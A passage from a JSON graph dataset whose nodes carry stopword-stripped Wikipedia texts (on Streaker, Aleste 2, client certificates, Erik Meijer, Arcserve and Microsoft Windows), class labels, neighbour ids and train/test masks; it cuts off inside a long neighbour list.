    "text": "Streaker_(video_game):streaker video game streaker arcade adventure game published mastertronic bulldog label 1987 game runs amstrad cpc msx sinclair zx spectrum hero game carlin naked man mugged stripped needs find clothes carlin town planet zuggi resembles town earth many ways locations including hotel cafe supermarket chemist shop streaker finds clothes able enter locations game fully dressed game arcade adventure somewhere puzzle-based adventure game action game gameplay controlled nested menu system mastertronic spellbound multitude items game many used seem purpose streaker pick keys open doors eat food items raise hunger levels needs solve number simple puzzles aspects life zuggi similar earth number fantastic elements world example streaker may teleport beam transfer using number different coloured beamers teleport streaker location corresponding beampad beampads moved streaker good way avoid thieves nice touches include streaker ability advance time acquiring stopwatch game played real time often need wait particular location open save load options appearing streaker picks tape recorder streaker quest made difficult presence number thieves steal streaker clothes contact cause lose life naked clothes may regained thieves finding offering thief item wants thieves follows despite rather unusual aim game seem prurient content therein 1980s young children occasionally unwittingly perplexed embarrassed teachers telling spent evening playing streaker",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6793,
    "label": 3,
    "text": "Aleste_2:aleste 2 aleste 2 アレスタ２ scrolling shooter video game developed released compile msx2 1989 exclusively japan sequel aleste first game aleste series feature recurring series heroine ellinor later appeared musha aleste aleste 2 along compile shooters also released now-defunct woomb service 2009 projectegg released game digitally windows also english game takes place year 2039 two decades super computer dia51 attacked decimated earth long restoration period earth invaded race alien plant-like humanoids called vagand intent finding new food source earth first attack earth vagand destroys earth space cruiser commanded previous earth hero ray waizen plan invade earth challenged newest version aleste piloted daughter ray yuri waizen ellinor vowed avenge father death personally kill vagand leader gaizel retro gamer included among top ten msx games three aleste titles msx computers worth seeking chose aleste 2 looks superb allows select weapons start game first title canon feature reoccurring protagonist ellinor",
    "neighbors": [
      5851,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 6794,
    "label": 4,
    "text": "Client_certificate:client certificate cryptography client certificate type digital certificate used client systems make authenticated requests remote server client certificates play key role many mutual authentication designs providing strong assurances requester identity",
    "neighbors": [
      8391,
      8039,
      4490,
      6064,
      6651
    ],
    "mask": "Train"
  },
  {
    "node_id": 6795,
    "label": 9,
    "text": "Erik_Meijer_(computer_scientist):erik meijer computer scientist erik meijer born 18 april 1963 curaçao dutch computer scientist entrepreneur tie-dye enthusiast 2000 early 2013 software architect microsoft headed cloud programmability team founded applied duality inc. 2013 associate professor utrecht university since 2015 director engineering facebook received ph.d. nijmegen university 1992 meijer research included areas functional programming particularly haskell compiler implementation parsing programming language design xml foreign function interfaces work microsoft included c visual basic linq volta reactive programming framework reactive extensions .net 2009 recipient microsoft outstanding technical leadership award 2007 outstanding technical achievement award member c team meijer lived netherlands antilles age 14 father retired job family moved back netherlands 2011 erik meijer appointed part-time professor cloud programming within software engineering research group delft university technology also member acm queue editorial board since 2013 also honorary professor programming language design school computer science university nottingham associated functional programming laboratory early 2013 erik meijer left microsoft started applied duality incorporated period worked hack language facebook rxjava library netflix dart language google christmas 2014 erik meijer diagnosed chronic myelogenous leukemia suffered close death experience hospitalized teaches course mooc provider coursera called principles reactive programming course edx called introduction functional programming",
    "neighbors": [
      1952,
      8059,
      3876,
      7147,
      1203,
      1591,
      1051,
      5399,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6796,
    "label": 4,
    "text": "Arcserve:arcserve arcserve provider data protection replication recovery solutions enterprise mid-market businesses arcserve founded 1983 cheyenne software software vendor ca technologies known computer associates acquired cheyenne 1996 continued develop market arcserve product brand arcserve first developed product used back software programs ensure data network could lost major function first release automatically copy information system mishaps power failures equipment malfunctions would destroy erase early nineties arcserve became cheyenne flagship product massive growth sales cheyenne brought improved version core program arcserve 1993 began distribution original equipment manufacturers oems mid-nineties cheyenne continued release series new arcserve products tailored specifically different market segments macintosh windows users software vendor ca technologies known computer associates acquired cheyenne 1996 continued develop market arcserve product brand august 2014 arcserve became independent company marlin equity partners acquired business ca technologies released first product named arcserve unified data protection udp arcserve provides largest independent software vendor isv developed backup software products market supports wide variety platforms applications arcserve unified data protection udp offered fully integrated software set-and-forget virtual physical appliances arcserve r cloud april 26 2017 arcserve announced acquisition email archiving technology named arcserve udp archiving july 11 2017 arcserve announced acquisition zetta cloud-based disaster recovery solutions provider offers direct-to-cloud draas baas arcserve udp cloud direct",
    "neighbors": [
      6993,
      7983,
      1358,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 6797,
    "label": 2,
    "text": "Microsoft_Windows:microsoft windows microsoft windows group several graphical operating system families developed marketed sold microsoft family caters certain sector computing industry active microsoft windows families include windows nt windows iot may encompass subfamilies e.g windows server windows embedded compact windows ce defunct microsoft windows families include windows 9x windows mobile windows phone microsoft introduced operating environment named windows november 20 1985 graphical operating system shell ms-dos response growing interest graphical user interfaces guis microsoft windows came dominate world personal computer pc market 90 market share overtaking mac os introduced 1984 apple came see windows unfair encroachment innovation gui development implemented products lisa macintosh eventually settled court microsoft favor 1993 pcs windows still popular operating system however 2014 microsoft admitted losing majority overall operating system market android massive growth sales android smartphones 2014 number windows devices sold less 25 android devices sold comparison however may fully relevant two operating systems traditionally target different platforms still numbers server use windows comparable competitors show one third market share similar end user use recent version windows pcs tablets smartphones embedded devices windows 10 recent version server computers windows server version 1903 specialized version windows also runs xbox one video game console microsoft developer windows registered several trademarks denote family windows operating systems target specific sector computing industry 2014 following windows families actively developed following windows families longer developed term windows collectively describes several generations microsoft operating system products products generally categorized follows history windows dates back 1981 microsoft started work program called interface manager announced november 1983 apple lisa macintosh name windows windows 1.0 released november 1985 windows 1.0 compete apple operating system achieved little popularity windows 1.0 complete operating system rather extends ms-dos shell windows 1.0 program known ms-dos executive components included calculator calendar cardfile clipboard viewer clock control panel notepad paint reversi terminal write windows 1.0 allow overlapping windows instead windows tiled modal dialog boxes may appear windows microsoft sold included windows development libraries c development environment included numerous windows samples windows 2.0 released december 1987 popular predecessor features several improvements user interface memory management windows 2.03 changed os tiled windows overlapping windows result change led apple computer filing suit microsoft alleging infringement apple copyrights windows 2.0 also introduced sophisticated keyboard shortcuts could make use expanded memory windows 2.1 released two different versions windows/286 windows/386 windows/386 uses virtual 8086 mode intel 80386 multitask several dos programs paged memory model emulate expanded memory using available extended memory windows/286 spite name runs intel 8086 intel 80286 processors runs real mode make use high memory area addition full windows-packages runtime-only versions shipped early windows software third parties made possible run windows software ms-dos without full windows feature set early versions windows often thought graphical shells mostly ran top ms-dos use file system services however even earliest windows versions already assumed many typical operating system functions notably executable file format providing device drivers timer graphics printer mouse keyboard sound unlike ms-dos windows allowed users execute multiple graphical applications time cooperative multitasking windows implemented elaborate segment-based software virtual memory scheme allows run applications larger available memory code segments resources swapped thrown away memory became scarce data segments moved memory given application relinquished processor control windows 3.0 released 1990 improved design mostly virtual memory loadable virtual device drivers vxds allow windows share arbitrary devices multi-tasked dos applications windows 3.0 applications run protected mode gives access several megabytes memory without obligation participate software virtual memory scheme run inside address space segmented memory provides degree protection windows 3.0 also featured improvements user interface microsoft rewrote critical operations c assembly windows 3.0 first microsoft windows version achieve broad commercial success selling 2 million copies first six months windows 3.1 made generally available march 1 1992 featured facelift august 1993 windows workgroups special version integrated peer-to-peer networking features version number 3.11 released sold along windows 3.1 support windows 3.1 ended december 31 2001 windows 3.2 released 1994 updated version chinese version windows 3.1 update limited language version fixed issues related complex writing system chinese language windows 3.2 generally sold computer manufacturers ten-disk version ms-dos also simplified chinese characters basic output translated utilities next major consumer-oriented release windows windows 95 released august 24 1995 still remaining ms-dos-based windows 95 introduced support native 32-bit applications plug play hardware preemptive multitasking long file names 255 characters provided increased stability predecessors windows 95 also introduced redesigned object oriented user interface replacing previous program manager start menu taskbar windows explorer shell windows 95 major commercial success microsoft ina fried cnet remarked time windows 95 finally ushered market 2001 become fixture computer desktops around world microsoft published four oem service releases osr windows 95 roughly equivalent service pack first osr windows 95 also first version windows bundled microsoft web browser internet explorer mainstream support windows 95 ended december 31 2000 extended support windows 95 ended december 31 2001 windows 95 followed release windows 98 june 25 1998 introduced windows driver model support usb composite devices support acpi hibernation support multi-monitor configurations windows 98 also included integration internet explorer 4 active desktop aspects windows desktop update series enhancements explorer shell also made available windows 95 may 1999 microsoft released windows 98 second edition updated version windows 98 windows 98 se added internet explorer 5.0 windows media player 6.2 amongst upgrades mainstream support windows 98 ended june 30 2002 extended support windows 98 ended july 11 2006 september 14 2000 microsoft released windows millennium edition last dos-based version windows windows incorporated visual interface enhancements windows nt-based counterpart windows 2000 faster boot times previous versions however required removal ability access real mode dos environment removing compatibility older programs expanded multimedia functionality including windows media player 7 windows movie maker windows image acquisition framework retrieving images scanners digital cameras additional system utilities system file protection system restore updated home networking tools however windows faced criticism speed instability along hardware compatibility issues removal real mode dos support pc world considered windows one worst operating systems microsoft ever released 4th worst tech product time november 1988 new development team within microsoft included former digital equipment corporation developers dave cutler mark lucovsky began work revamped version ibm microsoft os/2 operating system known nt os/2 nt os/2 intended secure multi-user operating system posix compatibility modular portable kernel preemptive multitasking support multiple processor architectures however following successful release windows 3.0 nt development team decided rework project use extended 32-bit port windows api known win32 instead os/2 win32 maintained similar structure windows apis allowing existing windows applications easily ported platform also supported capabilities existing nt kernel following approval microsoft staff development continued windows nt first 32-bit version windows however ibm objected changes ultimately continued os/2 development first release resulting operating system windows nt 3.1 named associate windows 3.1 released july 1993 versions desktop workstations servers windows nt 3.5 released september 1994 focusing performance improvements support novell netware followed windows nt 3.51 may 1995 included additional improvements support powerpc architecture windows nt 4.0 released june 1996 introducing redesigned interface windows 95 nt series february 17 2000 microsoft released windows 2000 successor nt 4.0 windows nt name dropped point order put greater focus windows brand next major version windows nt windows xp released october 25 2001 introduction windows xp aimed unify consumer-oriented windows 9x series architecture introduced windows nt change microsoft promised would provide better performance dos-based predecessors windows xp would also introduce redesigned user interface including updated start menu task-oriented windows explorer streamlined multimedia networking features internet explorer 6 integration microsoft .net passport services modes help provide compatibility software designed previous versions windows remote assistance functionality retail windows xp marketed two main editions home edition targeted towards consumers professional edition targeted towards business environments power users included additional security networking features home professional later accompanied media center edition designed home theater pcs emphasis support dvd playback tv tuner cards dvr functionality remote controls tablet pc edition designed mobile devices meeting specifications tablet computer support stylus pen input additional pen-enabled applications mainstream support windows xp ended april 14 2009 extended support ended april 8 2014 windows 2000 microsoft also changed release schedules server operating systems server counterpart windows xp windows server 2003 released april 2003 followed december 2005 windows server 2003 r2 lengthy development process windows vista released november 30 2006 volume licensing january 30 2007 consumers contained number new features redesigned shell user interface significant technical changes particular focus security features available number different editions subject criticism drop performance longer boot time criticism new uac stricter license agreement vista server counterpart windows server 2008 released early 2008 july 22 2009 windows 7 windows server 2008 r2 released rtm release manufacturing former released public 3 months later october 22 2009 unlike predecessor windows vista introduced large number new features windows 7 intended focused incremental upgrade windows line goal compatible applications hardware windows vista already compatible windows 7 multi-touch support redesigned windows shell updated taskbar home networking system called homegroup performance improvements windows 8 successor windows 7 released generally october 26 2012 number significant changes made windows 8 including introduction user interface based around microsoft metro design language optimizations touch-based devices tablets all-in-one pcs changes include start screen uses large tiles convenient touch interactions allow display continually updated information new class apps designed primarily use touch-based devices changes include increased integration cloud services online platforms social networks microsoft onedrive formerly skydrive xbox live services windows store service software distribution new variant known windows rt use devices utilize arm architecture update windows 8 called windows 8.1 released october 17 2013 includes features new live tile sizes deeper onedrive integration many revisions windows 8 windows 8.1 subject criticism removal start menu september 30 2014 microsoft announced windows 10 successor windows 8.1 released july 29 2015 addresses shortcomings user interface first introduced windows 8 changes pc include return start menu virtual desktop system ability run windows store apps within windows desktop rather full-screen mode windows 10 said available update qualified windows 7 sp1 windows 8.1 windows phone 8.1 devices get windows 10 application windows 7 windows 8.1 windows update windows 7 february 2017 microsoft announced migration windows source code repository perforce git migration involved 3.5 million separate files 300 gigabyte repository may 2017 90 percent engineering team uses git 8500 commits 1760 windows builds per day multilingual support built windows since windows 3 language keyboard interface changed region language control panel components supported input languages input method editors automatically installed windows installation windows xp earlier files east asian languages chinese right-to-left scripts arabic may need installed separately also said control panel third-party imes may also installed user feels provided one insufficient needs interface languages operating system free download languages limited certain editions windows language interface packs lips redistributable may downloaded microsoft download center installed edition windows xp later translate windows interface require certain base language language windows originally shipped used languages emerging markets full language packs translates complete operating system available specific editions windows ultimate enterprise editions windows vista 7 editions windows 8 8.1 rt except single language require specific base language commonly used popular languages french chinese languages downloaded download center available optional updates windows update service except windows 8 interface language installed applications affected changes windows interface language availability languages depends application developers windows 8 windows server 2012 introduces new language control panel interface input languages simultaneously changed language packs regardless type downloaded central location pc settings app windows 8.1 windows server 2012 r2 also includes counterpart settings page changing interface language also changes language preinstalled windows store apps mail maps news certain microsoft-developed apps remote desktop limitations language packs however still effect except full language packs installed edition except single language caters emerging markets windows nt included support several different platforms x86-based personal computer became dominant professional world windows nt 4.0 predecessors supported powerpc dec alpha mips r4000 although platforms implement 64-bit computing operating system treated 32-bit however windows 2000 successor windows nt 4.0 dropped support platforms except third generation x86 known ia-32 newer 32-bit mode client line windows nt family still runs ia-32 although windows server line ceased supporting platform release windows server 2008 r2 introduction intel itanium architecture ia-64 microsoft released new versions windows support itanium versions windows xp windows server 2003 released time mainstream x86 counterparts windows xp 64-bit edition released 2005 last windows client operating systems support itanium windows server line continues support platform windows server 2012 windows server 2008 r2 last windows operating system support itanium architecture april 25 2005 microsoft released windows xp professional x64 edition windows server 2003 x64 editions support x86-64 simply x64 eighth generation x86 architecture windows vista first client version windows nt released simultaneously ia-32 x64 editions x64 still supported edition windows 8 known windows rt specifically created computers arm architecture arm still used windows smartphones windows 10 tablets windows rt updated starting windows 10 fall creators update later includes support pcs arm architecture windows ce officially known windows embedded compact edition windows runs minimalistic computers like satellite navigation systems mobile phones windows embedded compact based dedicated kernel dubbed windows ce kernel microsoft licenses windows ce oems device makers oems device makers modify create user interfaces experiences windows ce provides technical foundation windows ce used dreamcast along sega proprietary os console windows ce core windows mobile derived successor windows phone 7 based components windows ce 6.0 r3 windows ce 7.0 windows phone 8 however based nt-kernel windows 8 windows embedded compact confused windows xp embedded windows nt 4.0 embedded modular editions windows based windows nt kernel xbox os unofficial name given version windows runs xbox one specific implementation emphasis virtualization using hyper-v three operating systems running consisting core operating system second implemented games windows-like environment applications microsoft updates xbox one os every month updates downloaded xbox live service xbox subsequently installed using offline recovery images downloaded via pc windows 10-based core replaced windows 8-based one update new system sometimes referred windows 10 xbox one onecore xbox one system also allows backward compatibility xbox 360 xbox 360 system backwards compatible original xbox 2017 microsoft announced would start using git open source version control system created linus torvalds microsoft previously used proprietary version control system called source depot microsoft began integrate git team foundation server 2013 windows continued rely source depot however decision came complexity windows codebase especially well suited decentralized nature linux development git originally created manage git repository contains complete history files proved unworkable windows developers cloning repository takes several hours microsoft working new project called virtual file system git vfsforgit address challenges according net applications tracks use operating systems devices active web windows used operating-system family personal computers july 2017 close 90 usage share including personal computers kinds e.g. desktops laptops mobile devices windows oses accounted 35.24 usage share july 2017 compared android highest 41.24 ios 13.22 macos 4.64 according statcounter tracks use operating systems use devices active web windows used less half market developing countries also developed ones—such united states use windows desktops plurality operating system fallen 46.18 united kingdom ireland numbers easiest monthly numbers find track real use may mirror installed base sales numbers recent years devices consistent server numbers next section terms number devices shipped operating system installed smartphones windows phone third-most-shipped os 2.6 android 82.8 ios 13.9 second quarter 2015 according idc across pcs mobile devices 2014 windows oses second-most-shipped 333 million devices 14 android 1.2 billion 49 ahead ios macos combined 263 million 11 use latest version windows 10 exceeded windows 7 globally since early 2018 developed countries japan australia us windows 10 already popular version since early 2017 usage share windows serversthose running web servers also kinds servers 33.6 consumer versions windows originally designed ease-of-use single-user pc without network connection security features built outset however windows nt successors designed security including network multi-user pcs initially designed internet security mind much since first developed early 1990s internet use less prevalent design issues combined programming errors e.g buffer overflows popularity windows means frequent target computer worm virus writers june 2005 bruce schneier counterpane internet security reported seen 1,000 new viruses worms previous six months 2005 kaspersky lab found around 11,000 malicious programs—viruses trojans back-doors exploits written windows microsoft releases security patches windows update service approximately month usually second tuesday month although critical updates made available shorter intervals necessary versions windows including windows 2000 sp3 windows xp updates automatically downloaded installed user selects result service pack 2 windows xp well service pack 1 windows server 2003 installed users quickly otherwise might windows 9x series offered option profiles multiple users concept access privileges allow concurrent access true multi-user operating systems addition implemented partial memory protection accordingly widely criticised lack security windows nt series operating systems contrast true multi-user implement absolute memory protection however lot advantages true multi-user operating system nullified fact prior windows vista first user account created setup process administrator account also default new accounts though windows xp limited accounts majority home users change account type fewer rights – partially due number programs unnecessarily required administrator rights – home users ran administrator time windows vista changes introducing privilege elevation system called user account control logging standard user logon session created token containing basic privileges assigned way new logon session incapable making changes would affect entire system logging user administrators group two separate tokens assigned first token contains privileges typically awarded administrator second restricted token similar standard user would receive user applications including windows shell started restricted token resulting reduced privilege environment even administrator account application requests higher privileges run administrator clicked uac prompt confirmation consent given including administrator credentials account requesting elevation member administrators group start process using unrestricted token leaked documents published wikileaks codenamed vault 7 dated 2013–2016 detail capabilities cia perform electronic surveillance cyber warfare ability compromise operating systems microsoft windows august 2019 computer experts reported bluekeep security vulnerability potentially affects older unpatched microsoft windows versions via program remote desktop protocol allowing possibility remote code execution may include related flaws collectively named dejablue affecting newer windows versions i.e. windows 7 recent versions well addition experts reported microsoft security vulnerability based legacy code involving microsoft ctf ctfmon ctfmon.exe affects windows versions older windows xp version recent windows 10 versions patch correct flaw currently available windows versions windows nt 3 based file system permission system referred agdlp accounts global local permissions file permissions applied file/folder form 'local group 'global groups members global groups hold groups users depending different windows versions used system varies vendor products linux netware due 'static allocation permission applied directory file folder however using process aglp/agdlp/agudlp allows small number static permissions applied allows easy changes account groups without reapplying file permissions files folders january 6 2005 microsoft released beta version microsoft antispyware based upon previously released giant antispyware february 14 2006 microsoft antispyware became windows defender release beta 2 windows defender freeware program designed protect spyware unwanted software windows xp windows server 2003 users genuine copies microsoft windows freely download program microsoft web site windows defender ships part windows vista 7 windows 8 windows defender microsoft security essentials combined single program named windows defender based microsoft security essentials borrowing features user interface although enabled default turned use another anti-virus solution windows malicious software removal tool optional microsoft safety scanner two free security products offered microsoft windows 10 anniversary update microsoft introduced limited periodic scanning feature allows windows defender scan detect remove threats third-party anti-virus software missed advanced threat protection service introduced enterprise users new service uses cloud service detect take actions advanced network attacks article based report symantec internetnews.com described microsoft windows fewest number patches shortest average patch development time five operating systems monitored last six months 2006 study conducted kevin mitnick marketing communications firm avantgarde 2004 found unprotected unpatched windows xp system service pack 1 lasted four minutes internet compromised unprotected also unpatched windows server 2003 system compromised connected internet 8 hours computer running windows xp service pack 2 compromised aol national cyber security alliance online safety study october 2004 determined 80 windows users infected least one spyware/adware product much documentation available describing increase security microsoft windows products typical suggestions include deploying microsoft windows behind hardware software firewall running anti-virus anti-spyware software installing patches become available windows update owing operating system popularity number applications released aim provide compatibility windows applications either compatibility layer another operating system standalone system run software written windows box include",
    "neighbors": [
      1,
      8197,
      8199,
      9,
      8204,
      13,
      8206,
      18,
      8211,
      8213,
      25,
      8225,
      8227,
      8228,
      44,
      8243,
      8247,
      57,
      61,
      8254,
      8255,
      8258,
      75,
      76,
      79,
      81,
      83,
      85,
      8278,
      8281,
      97,
      8290,
      100,
      8294,
      8295,
      8296,
      8298,
      107,
      8299,
      8301,
      8303,
      8304,
      115,
      117,
      8312,
      8315,
      8328,
      8333,
      142,
      8345,
      161,
      162,
      168,
      178,
      8374,
      185,
      186,
      190,
      194,
      8387,
      8388,
      8389,
      198,
      200,
      206,
      8398,
      8402,
      214,
      215,
      8410,
      8413,
      225,
      226,
      8418,
      8419,
      8422,
      231,
      8423,
      8429,
      242,
      8439,
      8443,
      8445,
      259,
      8455,
      270,
      273,
      8465,
      8466,
      278,
      8473,
      284,
      8476,
      292,
      8484,
      296,
      297,
      8491,
      8492,
      8493,
      303,
      8499,
      8500,
      8502,
      8505,
      321,
      8513,
      8517,
      8520,
      8524,
      8526,
      8528,
      342,
      8539,
      348,
      349,
      356,
      359,
      8551,
      362,
      363,
      8554,
      8561,
      376,
      8568,
      8572,
      8573,
      8576,
      8582,
      8584,
      394,
      400,
      8594,
      8595,
      412,
      8604,
      421,
      8614,
      423,
      8618,
      8621,
      430,
      8627,
      8630,
      8631,
      440,
      445,
      8637,
      8644,
      463,
      8659,
      468,
      469,
      8664,
      477,
      478,
      8677,
      487,
      488,
      8679,
      8681,
      494,
      8687,
      499,
      8692,
      502,
      507,
      8700,
      8703,
      515,
      521,
      8724,
      533,
      535,
      537,
      8729,
      540,
      8737,
      8740,
      550,
      559,
      8753,
      8757,
      569,
      576,
      8771,
      580,
      582,
      585,
      587,
      601,
      8793,
      603,
      8798,
      8799,
      608,
      617,
      8810,
      621,
      622,
      8816,
      8824,
      634,
      8827,
      636,
      637,
      639,
      641,
      8834,
      8837,
      8841,
      651,
      653,
      8847,
      8852,
      661,
      8856,
      8857,
      670,
      8866,
      8871,
      681,
      8876,
      8879,
      8886,
      697,
      8889,
      699,
      700,
      8897,
      708,
      8901,
      8911,
      8913,
      722,
      8922,
      736,
      740,
      741,
      742,
      8932,
      8940,
      749,
      8941,
      8943,
      753,
      8954,
      8959,
      771,
      8965,
      8966,
      8969,
      778,
      8970,
      780,
      8971,
      782,
      8976,
      8977,
      8978,
      787,
      788,
      789,
      790,
      791,
      8982,
      8985,
      8988,
      8994,
      8995,
      804,
      8998,
      808,
      813,
      823,
      9022,
      833,
      839,
      9033,
      842,
      844,
      847,
      9045,
      865,
      9057,
      868,
      9063,
      9066,
      877,
      9070,
      9081,
      890,
      9097,
      9100,
      9106,
      915,
      918,
      919,
      9112,
      9119,
      929,
      9121,
      9125,
      935,
      9128,
      9129,
      9133,
      944,
      9138,
      950,
      9142,
      953,
      956,
      9151,
      960,
      969,
      974,
      975,
      9166,
      9168,
      9171,
      9173,
      9177,
      988,
      9187,
      1000,
      9194,
      9196,
      9198,
      1007,
      9205,
      9215,
      9216,
      9217,
      1033,
      9227,
      1038,
      9231,
      1043,
      1046,
      9245,
      1055,
      1062,
      1064,
      1065,
      9257,
      9258,
      9263,
      1077,
      1081,
      9273,
      1083,
      9276,
      9279,
      1098,
      1100,
      1103,
      1107,
      1113,
      9322,
      1132,
      1134,
      9332,
      9335,
      1145,
      1147,
      1148,
      9340,
      1150,
      1151,
      9348,
      9358,
      1167,
      9360,
      1170,
      9363,
      1172,
      9366,
      1176,
      1177,
      1178,
      9370,
      9375,
      1185,
      9377,
      1187,
      9383,
      1193,
      9389,
      9394,
      1203,
      1209,
      1211,
      1212,
      1215,
      9408,
      9417,
      9420,
      9423,
      1234,
      9431,
      1242,
      9434,
      9436,
      1245,
      9437,
      1247,
      9442,
      1251,
      1253,
      9448,
      9452,
      9456,
      9460,
      1273,
      1274,
      9466,
      9468,
      1278,
      1294,
      9487,
      9491,
      9496,
      9498,
      9501,
      1315,
      9508,
      9509,
      9525,
      1334,
      1337,
      9530,
      1340,
      1347,
      1348,
      9539,
      1352,
      9544,
      1363,
      1365,
      9557,
      9563,
      9565,
      9569,
      1379,
      9579,
      1390,
      9585,
      9591,
      9593,
      9597,
      1407,
      9600,
      1411,
      9605,
      1417,
      1418,
      9612,
      9616,
      9620,
      1429,
      1438,
      1439,
      1440,
      9630,
      1443,
      1445,
      1448,
      1449,
      1450,
      1451,
      9640,
      9641,
      9643,
      9650,
      9654,
      9655,
      9658,
      1467,
      9660,
      9665,
      1474,
      9671,
      1487,
      9688,
      1498,
      9694,
      9695,
      1509,
      1510,
      1513,
      1515,
      9709,
      1520,
      1530,
      9727,
      9728,
      9732,
      9736,
      1549,
      1551,
      9743,
      9745,
      9746,
      1560,
      9755,
      1564,
      9757,
      9762,
      1575,
      9768,
      1577,
      1580,
      1581,
      9783,
      9784,
      1593,
      1594,
      9787,
      1596,
      1599,
      9791,
      9798,
      1608,
      9803,
      9808,
      1617,
      1619,
      9812,
      9813,
      1623,
      9816,
      1626,
      9819,
      1631,
      1632,
      9827,
      9835,
      1644,
      9836,
      1647,
      9839,
      9840,
      1655,
      1656,
      9848,
      1664,
      1666,
      1668,
      9865,
      1674,
      1676,
      9869,
      9874,
      1683,
      1687,
      9880,
      9881,
      9882,
      9885,
      1694,
      9887,
      1700,
      9892,
      1702,
      1703,
      1708,
      9902,
      1712,
      9904,
      9907,
      9910,
      1721,
      9915,
      9920,
      1736,
      9932,
      1741,
      1742,
      9936,
      9939,
      1750,
      9943,
      9944,
      1754,
      9946,
      1761,
      1770,
      9964,
      9970,
      9971,
      9972,
      9981,
      1791,
      1792,
      9983,
      1804,
      9996,
      9997,
      10001,
      1811,
      1813,
      1817,
      10016,
      1832,
      10024,
      10026,
      10027,
      1837,
      10029,
      10033,
      1844,
      10039,
      10041,
      1856,
      1858,
      10051,
      10054,
      1869,
      10068,
      1879,
      1881,
      10076,
      10079,
      10085,
      10087,
      10089,
      1900,
      10093,
      10101,
      1911,
      1916,
      1917,
      10109,
      10113,
      10115,
      10121,
      1935,
      1940,
      10132,
      1942,
      1943,
      10135,
      10142,
      10151,
      10153,
      10154,
      10155,
      10157,
      10158,
      10159,
      1968,
      10166,
      10169,
      1978,
      10170,
      10173,
      10176,
      10177,
      10187,
      1996,
      2000,
      2002,
      2005,
      2006,
      2010,
      10208,
      10217,
      2027,
      10222,
      10229,
      2041,
      2042,
      2043,
      10235,
      2045,
      10236,
      10239,
      10240,
      2049,
      2050,
      10253,
      2062,
      10255,
      10273,
      10279,
      10281,
      10282,
      10287,
      10289,
      2101,
      2105,
      10297,
      2107,
      10304,
      2114,
      10306,
      10308,
      2118,
      2121,
      10317,
      2138,
      2139,
      10333,
      10338,
      10339,
      10340,
      10341,
      10343,
      10344,
      10349,
      10352,
      2168,
      10363,
      2179,
      2182,
      10374,
      2186,
      10378,
      10380,
      10382,
      2193,
      2196,
      2197,
      10388,
      2199,
      10389,
      2201,
      10392,
      2205,
      10397,
      2213,
      2221,
      10414,
      2225,
      2227,
      10428,
      10431,
      10433,
      2244,
      2248,
      2249,
      10447,
      10448,
      2257,
      2259,
      10451,
      10457,
      2266,
      2267,
      10459,
      2279,
      10472,
      2282,
      10480,
      2291,
      2292,
      2293,
      10486,
      10496,
      10499,
      2309,
      2317,
      10511,
      2335,
      2338,
      10531,
      2345,
      2355,
      2361,
      2364,
      2368,
      10561,
      2370,
      10564,
      2380,
      2382,
      10575,
      10576,
      10582,
      2391,
      2392,
      2395,
      10590,
      2399,
      2401,
      2402,
      2409,
      10606,
      2417,
      2430,
      10623,
      2432,
      10631,
      10637,
      2447,
      2457,
      10649,
      10650,
      2462,
      10654,
      10657,
      10658,
      2467,
      2474,
      2476,
      2477,
      10676,
      10678,
      2494,
      2509,
      10705,
      10708,
      2519,
      2520,
      2530,
      10722,
      2534,
      10727,
      10730,
      10731,
      10732,
      2545,
      10747,
      10751,
      2560,
      10752,
      2563,
      10757,
      2566,
      2568,
      10763,
      10764,
      10765,
      10769,
      2579,
      10776,
      2591,
      2593,
      10787,
      10790,
      10791,
      2601,
      2603,
      2610,
      10803,
      2616,
      10808,
      10809,
      10812,
      2621,
      2625,
      10824,
      10828,
      10834,
      10835,
      10839,
      10841,
      2651,
      2652,
      2654,
      2656,
      10848,
      10851,
      10856,
      2666,
      2667,
      2670,
      2672,
      10873,
      10874,
      10875,
      2684,
      2685,
      2687,
      10879,
      2691,
      2692,
      10883,
      10885,
      10886,
      10891,
      10896,
      10898,
      10900,
      2709,
      2710,
      10902,
      10903,
      10910,
      2721,
      10914,
      10926,
      2739,
      10935,
      10937,
      10939,
      2749,
      2755,
      10957,
      10959,
      2769,
      10962,
      10965,
      2777,
      10971,
      2782,
      2783,
      2786,
      10987,
      10989,
      2801,
      10993,
      2804,
      10999,
      2811,
      2815,
      11007,
      11011,
      2824,
      2826,
      2836,
      11030,
      2839,
      2854,
      2865,
      11060,
      11061,
      2870,
      11063,
      11065,
      11068,
      11073,
      11074,
      11075,
      2893,
      11088,
      2903,
      2907,
      2908,
      11101,
      11103,
      11108,
      2919,
      11112,
      2921,
      11113,
      11121,
      2933,
      11126,
      2935,
      2940,
      11132,
      2943,
      2944,
      11152,
      11153,
      2966,
      2970,
      11178,
      2987,
      2990,
      11182,
      11184,
      11196,
      11197,
      3006,
      3007,
      11198,
      11203,
      11204,
      11205,
      11207,
      11218,
      3027,
      11221,
      3030,
      3032,
      3034,
      11227,
      11228,
      11229,
      11231,
      11237,
      3046,
      11239,
      3048,
      3051,
      3053,
      11245,
      11247,
      11249,
      11251,
      3064,
      11257,
      3070,
      11263,
      3074,
      11269,
      3083,
      11276,
      11278,
      11283,
      11287,
      3096,
      3102,
      3104,
      11300,
      3109,
      11301,
      3114,
      11306,
      11313,
      3129,
      3135,
      3142,
      11344,
      11346,
      11350,
      11351,
      3160,
      11357,
      3170,
      11363,
      11364,
      11371,
      3183,
      11380,
      3191,
      11385,
      3197,
      11390,
      11392,
      3201,
      3209,
      3210,
      3214,
      11412,
      3224,
      11418,
      3229,
      11422,
      3235,
      3243,
      3245,
      3246,
      3248,
      3250,
      11443,
      11446,
      11460,
      3272,
      11464,
      3280,
      11472,
      11475,
      3284,
      11478,
      3287,
      3289,
      3293,
      11485,
      3296,
      3297,
      11488,
      11489,
      3308,
      11503,
      3320,
      11513,
      3323,
      11519,
      11521,
      11524,
      3344,
      11539,
      3351,
      11546,
      11549,
      11552,
      3366,
      11559,
      3371,
      11566,
      3378,
      11572,
      3381,
      11581,
      3390,
      11584,
      3393,
      3394,
      3395,
      3399,
      3401,
      11601,
      11602,
      3412,
      11605,
      3414,
      11606,
      3420,
      11614,
      3426,
      3430,
      11622,
      11623,
      3439,
      11632,
      11633,
      3442,
      11635,
      3449,
      11641,
      11651,
      3462,
      3463,
      3469,
      3471,
      11664,
      11667,
      3477,
      11672,
      3482,
      11675,
      11677,
      11683,
      3496,
      11688,
      3499,
      3522,
      3527,
      3533,
